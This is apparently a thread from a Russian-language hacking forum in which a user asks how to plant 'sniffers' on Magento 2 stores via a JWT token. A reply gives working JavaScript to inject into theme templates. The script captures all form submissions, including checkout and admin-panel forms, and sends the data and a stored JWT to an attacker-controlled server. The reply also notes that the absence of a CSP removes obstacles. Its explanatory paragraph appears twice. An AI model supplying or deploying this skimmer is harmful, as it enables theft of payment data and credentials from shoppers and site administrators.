Hello, question regarding installing sniffers on magento2 sites with jwt token (fresh generated). What are the requirements (no csp), how is the process on blocks n pages. Thanks
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Is it possible injecting sniffer through jwt token
- Автор темы Anonify
- Дата начала
First, you’ll need access to the Magento 2 files, ideally through the theme or custom module. Then inject your sniffer code to a template file like header.phtml or footer.phtml.
For example:-
The above sample script captures form data and sends it to your server, including the JWT token for authentication. I recommend to you to check if the sniffer works on important pages like product pages, checkout, or the admin panel. And as you mentioned there’s no CSP, you don’t need to worry about script restrictions. Plus ensure that your server is set up to securely receive the data.
For example:-
HTML:
<script>
// Capture form submissions
document.addEventListener('submit', function (e) {
const formData = new FormData(e.target);
const data = {};
formData.forEach((value, key) => data[key] = value);
// Send data to your server with the JWT token
fetch('https://your-server.com/capture', {
method: 'POST',
headers: {
'Content-Type': 'application/json',
'Authorization': `Bearer ${localStorage.getItem('jwt_token')}`
},
body: JSON.stringify(data)
});
});
</script>The above sample script captures form data and sends it to your server, including the JWT token for authentication. I recommend to you to check if the sniffer works on important pages like product pages, checkout, or the admin panel. And as you mentioned there’s no CSP, you don’t need to worry about script restrictions. Plus ensure that your server is set up to securely receive the data.